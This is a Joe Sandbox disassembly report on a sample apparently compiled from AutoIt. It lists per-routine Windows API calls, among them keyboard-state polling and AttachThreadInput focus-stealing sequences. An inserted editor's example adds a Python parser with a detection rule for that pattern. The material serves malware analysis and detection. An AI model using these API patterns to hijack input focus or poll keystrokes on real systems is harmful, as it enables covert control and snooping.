• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 323675364-22481851
• Opcode ID: 8ca26926b3aa457bfd3c0da031a3df3a90e220d6c0bd71d0366d71f68ece26e5
• Instruction ID: 86e1d0d5fd5d521cef622e784bd4d1d1c41e1d2859f74fb3fe1d0585df5dd264
• Opcode Fuzzy Hash: 8ca26926b3aa457bfd3c0da031a3df3a90e220d6c0bd71d0366d71f68ece26e5
• Instruction Fuzzy Hash: 67410972C20129ABCB21EFA4EC46DEEB778FF04750F444169E901A2161EB719EA4CF50
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002F4AD9
• CreateCompatibleDC.GDI32(00000000), ref: 002F4AE0
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002F4AF3
• SelectObject.GDI32(00000000,00000000), ref: 002F4AFB
• GetPixel.GDI32(00000000,00000000,00000000), ref: 002F4B06
• DeleteDC.GDI32(00000000), ref: 002F4B10
• GetWindowLongW.USER32(?,000000EC), ref: 002F4B1A
• SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 002F4B30
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 002F4B3C
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: 1a272952f0576f79772fa1c8a271ca1a7b514c4357129456d34ee9cfef83bcf8
• Instruction ID: d556dbfa2ceb7ecc8c3ad3fc74dfc3b162f2a80dc79446ab98c478ec2ed9d462
• Opcode Fuzzy Hash: 1a272952f0576f79772fa1c8a271ca1a7b514c4357129456d34ee9cfef83bcf8
• Instruction Fuzzy Hash: D0316031510219BBDF11AF64EC08FEB7B6AFF093A4F110221FA15D61A0C775D860DB94
APIs
• VariantInit.OLEAUT32(?), ref: 002E46B9
• CoInitialize.OLE32(00000000), ref: 002E46E7
• CoUninitialize.OLE32 ref: 002E46F1
• _wcslen.LIBCMT ref: 002E478A
• GetRunningObjectTable.OLE32(00000000,?), ref: 002E480E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 002E4932
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 002E496B
• CoGetObject.OLE32(?,00000000,00300B64,?), ref: 002E498A
• SetErrorMode.KERNEL32(00000000), ref: 002E499D
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002E4A21
• VariantClear.OLEAUT32(?), ref: 002E4A35
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
• String ID:
• API String ID: 429561992-0
• Opcode ID: e1e976d4222e942c67dcec5ae019cc97d5278504dc8a8ee4f703a9d1c64ecea5
• Instruction ID: ecda7c2073393b266250fc04bdc72f502713fad272f764234864e744212457d0
• Opcode Fuzzy Hash: e1e976d4222e942c67dcec5ae019cc97d5278504dc8a8ee4f703a9d1c64ecea5
• Instruction Fuzzy Hash: 6AC166716283459FD700EF69C88492BB7E9FF89348F40492DF98A9B211DB30ED15CB92
APIs
• CoInitialize.OLE32(00000000), ref: 002D8538
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002D85D4
• SHGetDesktopFolder.SHELL32(?), ref: 002D85E8
• CoCreateInstance.OLE32(00300CD4,00000000,00000001,00327E8C,?), ref: 002D8634
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002D86B9
• CoTaskMemFree.OLE32(?,?), ref: 002D8711
• SHBrowseForFolderW.SHELL32(?), ref: 002D879C
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002D87BF
• CoTaskMemFree.OLE32(00000000), ref: 002D87C6
• CoTaskMemFree.OLE32(00000000), ref: 002D881B
• CoUninitialize.OLE32 ref: 002D8821
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
• String ID:
• API String ID: 2762341140-0
• Opcode ID: 60a70d2f053a277d11948f33a6f59e8dfc799be0c27e62648dcbc43a37857900
• Instruction ID: 7238b78ace498f5977a708ca3ff5cbc37a6af95e9a0df9baec6818a5a8574d56
• Opcode Fuzzy Hash: 60a70d2f053a277d11948f33a6f59e8dfc799be0c27e62648dcbc43a37857900
• Instruction Fuzzy Hash: 40C12875A10109AFDB14DFA4C888DAEBBF9FF48354B1485A9E41ADB361CB30ED41CB90
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002C039F
• SafeArrayAllocData.OLEAUT32(?), ref: 002C03F8
• VariantInit.OLEAUT32(?), ref: 002C040A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 002C042A
• VariantCopy.OLEAUT32(?,?), ref: 002C047D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 002C0491
• VariantClear.OLEAUT32(?), ref: 002C04A6
• SafeArrayDestroyData.OLEAUT32(?), ref: 002C04B3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002C04BC
• VariantClear.OLEAUT32(?), ref: 002C04CE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002C04D9
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
• GetKeyboardState.USER32(?), ref: 002CA65D
• GetAsyncKeyState.USER32(000000A0), ref: 002CA6DE
• GetKeyState.USER32(000000A0), ref: 002CA6F9
• GetAsyncKeyState.USER32(000000A1), ref: 002CA713
• GetKeyState.USER32(000000A1), ref: 002CA728
• GetAsyncKeyState.USER32(00000011), ref: 002CA740
• GetKeyState.USER32(00000011), ref: 002CA752
• GetAsyncKeyState.USER32(00000012), ref: 002CA76A
• GetKeyState.USER32(00000012), ref: 002CA77C
• GetAsyncKeyState.USER32(0000005B), ref: 002CA794
• GetKeyState.USER32(0000005B), ref: 002CA7A6
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: _wcslen$BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 707087890-567219261
APIs
• CoInitialize.OLE32 ref: 002E41D1
• CoUninitialize.OLE32 ref: 002E41DC
• CoCreateInstance.OLE32(?,00000000,00000017,00300B44,?), ref: 002E4236
• IIDFromString.OLE32(?,?), ref: 002E42A9
• VariantInit.OLEAUT32(?), ref: 002E4341
• VariantClear.OLEAUT32(?), ref: 002E4393
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
APIs
• GetLocalTime.KERNEL32(?), ref: 002D8C9C
• SystemTimeToFileTime.KERNEL32(?,?), ref: 002D8CAC
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002D8CB8
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002D8D55
• SetCurrentDirectoryW.KERNEL32(?), ref: 002D8D69
• SetCurrentDirectoryW.KERNEL32(?), ref: 002D8D9B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002D8DD1
• SetCurrentDirectoryW.KERNEL32(?), ref: 002D8DDA
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local$System
• String ID: *.*
• API String ID: 1464919966-438819550
APIs
• CreateMenu.USER32 ref: 002F4715
• SetMenu.USER32(?,00000000), ref: 002F4724
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002F47AC
• IsMenu.USER32(?), ref: 002F47C0
• CreatePopupMenu.USER32 ref: 002F47CA
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002F47F7
• DrawMenuBar.USER32 ref: 002F47FF
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                        • String ID: 0$F
                                                                                                                                                                        • API String ID: 161812096-3044882817
                                                                                                                                                                        • Opcode ID: b15ed399f1528d6d2134051a6d4246d4bb313e07af429878a201a8c28849ccb7
                                                                                                                                                                        • Instruction ID: a9bc8e558a78e8143eff1c4fec7712d55c3a07695834223d6dcc2c2ac18bf7a2
                                                                                                                                                                        • Opcode Fuzzy Hash: b15ed399f1528d6d2134051a6d4246d4bb313e07af429878a201a8c28849ccb7
                                                                                                                                                                        • Instruction Fuzzy Hash: 9D419F74A1120AEFDB14EF64E848EBABBB5FF09394F144028FA4597350D7B0A924CF50
APIs
  • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
  • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
• SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 002C28B1
• GetDlgCtrlID.USER32 ref: 002C28BC
• GetParent.USER32 ref: 002C28D8
• SendMessageW.USER32(00000000,?,00000111,?), ref: 002C28DB
• GetDlgCtrlID.USER32(?), ref: 002C28E4
• GetParent.USER32(?), ref: 002C28F8
• SendMessageW.USER32(00000000,?,00000111,?), ref: 002C28FB
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
• Opcode ID: 1085c195d0de11abfd1cbcc90dc3fe1cf787ba798c229efa8698c45dfc6f3d0a
• Instruction ID: c75f2cf50d8ebe3dc0b3c821afb63bc786ddcfe8a049a88123946436afc498a2
• Opcode Fuzzy Hash: 1085c195d0de11abfd1cbcc90dc3fe1cf787ba798c229efa8698c45dfc6f3d0a
• Instruction Fuzzy Hash: A621AF74D10118EBCF01AFA0DC89EEEBBA9EF09350F10026AB951A7291DB755868DF60
APIs
  • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
  • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
• SendMessageW.USER32(?,00000186,00020000,00000000), ref: 002C2990
• GetDlgCtrlID.USER32 ref: 002C299B
• GetParent.USER32 ref: 002C29B7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 002C29BA
• GetDlgCtrlID.USER32(?), ref: 002C29C3
• GetParent.USER32(?), ref: 002C29D7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 002C29DA
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
• Opcode ID: dd55228a6294a811d76500f7a369a604b28727bfb84010597be057eebb9cf0d1
• Instruction ID: d72772375b8428b6a33abdb7c8673ed88e2b4971655680efd85cd43f64ce9fba
• Opcode Fuzzy Hash: dd55228a6294a811d76500f7a369a604b28727bfb84010597be057eebb9cf0d1
• Instruction Fuzzy Hash: 5621CF75E10118BBCF01AFA0EC85EFEBBB9EF05350F10425AB951A7291CB755868DF60
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002F4539
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002F453C
• GetWindowLongW.USER32(?,000000F0), ref: 002F4563
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002F4586
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002F45FE
• SendMessageW.USER32(?,00001074,00000000,00000007), ref: 002F4648
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 002F4663
• SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 002F467E
• SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 002F4692
• SendMessageW.USER32(?,00001008,00000000,00000007), ref: 002F46AF
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: 854d0f079fe82a00f33e7dcdbb23750705fdef5a07413689e4f3c3bbbac38d84
• Instruction ID: 2cec6c6f0fc8f905d17bced8e540fc7cf29b83c72b5a99c3d8099ddfe7abbad3
• Opcode Fuzzy Hash: 854d0f079fe82a00f33e7dcdbb23750705fdef5a07413689e4f3c3bbbac38d84
• Instruction Fuzzy Hash: 19618C75A00209AFDB11EFA4CC81EFEB7B8EF09750F100169FA04E72A1D7B4A965DB50
APIs
• GetCurrentThreadId.KERNEL32 ref: 002CBB18
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBB2C
• GetWindowThreadProcessId.USER32(00000000), ref: 002CBB33
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBB42
• GetWindowThreadProcessId.USER32(?,00000000), ref: 002CBB54
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBB6D
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBB7F
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBBC4
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBBD9
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBBE4
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 4fb26eaf4cd3a9e811113b1062081276627c3862b87339849b6e8546a004ebe6
• Instruction ID: 532ee936778adb52530294158310e2c8d73fecf2dd1c7a8a27a808c2576c7f7f
• Opcode Fuzzy Hash: 4fb26eaf4cd3a9e811113b1062081276627c3862b87339849b6e8546a004ebe6
• Instruction Fuzzy Hash: 8731BF79A14245AFDB169F24EDCAF79B7AEAB0436AF104119FE05D71A4C7B4AC40CF20
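The routine listed above (GetCurrentThreadId, GetForegroundWindow, GetWindowThreadProcessId, then a run of paired AttachThreadInput calls) is the standard way for a program to join the foreground window's input queue, which sidesteps the foreground-lock rules Windows applies to SetForegroundWindow and SetFocus; AutoIt's WinActivate/ControlSend implement it this way. Note that the values Joe Sandbox prints in parentheses are the stack words captured at the call site, so there are more of them than the API has parameters, and "?" marks a word it could not resolve. The following is an added example, not part of the Joe Sandbox report: a small parser for these per-function API listings with one detection rule for that pattern. The SAMPLE text is excerpted from three listings on this page; the rule name FOCUS_STEAL and the choice to count fAttach values are the editor's, not Joe Sandbox's.

```python
"""Parse Joe Sandbox per-function API listings and flag the
GetForegroundWindow / GetWindowThreadProcessId / AttachThreadInput pattern.
Added example; SAMPLE is excerpted from the report, the rule is the editor's."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set

# One call line. The parenthesised words are the stack values Joe Sandbox read
# at the call site, so there can be more of them than the API has parameters,
# and '?' marks a value it could not resolve.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]   # hex words or '?' exactly as printed
    ref: int          # address of the call instruction
    subcall: bool     # "Part of subcall function" line


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)

    def names(self) -> Set[str]:
        """APIs the routine calls directly (subcall lines excluded)."""
        return {c.name for c in self.calls if not c.subcall}


def parse_listing(text: str) -> List[FunctionEntry]:
    """Start a new entry at each 'APIs' header; keep only lines that parse."""
    entries: List[FunctionEntry] = []
    current = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        m = API_LINE.match(line)
        if m is None or current is None:
            continue
        args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
        current.calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                     int(m.group("ref"), 16), m.group("sub") is not None))
    return entries


# Attaching to the foreground thread's input queue is how a program defeats the
# foreground-lock rules on SetForegroundWindow/SetFocus (AutoIt's WinActivate
# does exactly this). All three APIs in one routine is the tell. Editor's rule.
FOCUS_STEAL = {"GetForegroundWindow", "GetWindowThreadProcessId", "AttachThreadInput"}


def flag_focus_steal(entries: List[FunctionEntry]) -> List[Dict[str, int]]:
    """One record per matching routine. AttachThreadInput(idAttach, idAttachTo,
    fAttach): word 3 is fAttach, 1 attaches and 0 detaches; '?' counts as neither."""
    hits = []
    for idx, entry in enumerate(entries):
        if not FOCUS_STEAL <= entry.names():
            continue
        ati = [c for c in entry.calls if c.name == "AttachThreadInput"]
        flags = [c.args[2] for c in ati if len(c.args) >= 3]
        hits.append({"entry": idx, "attach_calls": len(ati),
                     "attach": flags.count("00000001"),
                     "detach": flags.count("00000000")})
    return hits


# Constructed sample: three listings excerpted verbatim from this report.
SAMPLE = """
APIs
• GetCurrentThreadId.KERNEL32 ref: 002CBB18
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBB2C
• GetWindowThreadProcessId.USER32(00000000), ref: 002CBB33
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBB42
• GetWindowThreadProcessId.USER32(?,00000000), ref: 002CBB54
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBB6D
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBB7F
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBBC4
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBBD9
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,002CABA8,?,00000001), ref: 002CBBE4
Memory Dump Source
APIs
  • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
  • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
• SendMessageW.USER32(?,00000186,00020000,00000000), ref: 002C2990
• GetDlgCtrlID.USER32 ref: 002C299B
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00262AF9
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 002A3AAD
"""

if __name__ == "__main__":
    for hit in flag_focus_steal(parse_listing(SAMPLE)):
        print(hit)  # {'entry': 0, 'attach_calls': 6, 'attach': 3, 'detach': 2}
```

Run against the whole "Disassembly" section of a report, the parser gives one FunctionEntry per listed routine, and further rules can be written the same way as FOCUS_STEAL, as a set of API names that must all appear in one routine. Only the first entry in SAMPLE trips the rule; the three attach and two detach calls match the pairing you would expect from a focus-and-release sequence, with one fAttach word left unresolved by the sandbox.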
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00262AF9
• OleUninitialize.OLE32(?,00000000), ref: 00262B98
• UnregisterHotKey.USER32(?), ref: 00262D7D
• DestroyWindow.USER32(?), ref: 002A3A1B
• FreeLibrary.KERNEL32(?), ref: 002A3A80
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 002A3AAD
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                        • String ID: close all
                                                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                                                        • Opcode ID: 8e5ca8060c62c64deea7164c83b40a193c9364ad12ce3403ebb2a9fe6579a34c
                                                                                                                                                                        • Instruction ID: 6ea2fccd2d69e369a46cf00ca4a2efb5215abb5b143640ab13f4b498a5bf7c00
                                                                                                                                                                        • Opcode Fuzzy Hash: 8e5ca8060c62c64deea7164c83b40a193c9364ad12ce3403ebb2a9fe6579a34c
                                                                                                                                                                        • Instruction Fuzzy Hash: 0CD18D31721622CFCB19EF14C489B29F7A1BF05754F1142AEE94AAB252CB31AD76CF50
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002D89F2
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002D8A06
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 002D8A30
                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 002D8A4A
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002D8A5C
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002D8AA5
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002D8AF5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                        • API String ID: 769691225-438819550
                                                                                                                                                                        • Opcode ID: 08c70b7bacf3d240ed67f35d8655e2b334154e3aeed38ddc6d05e142f71d822e
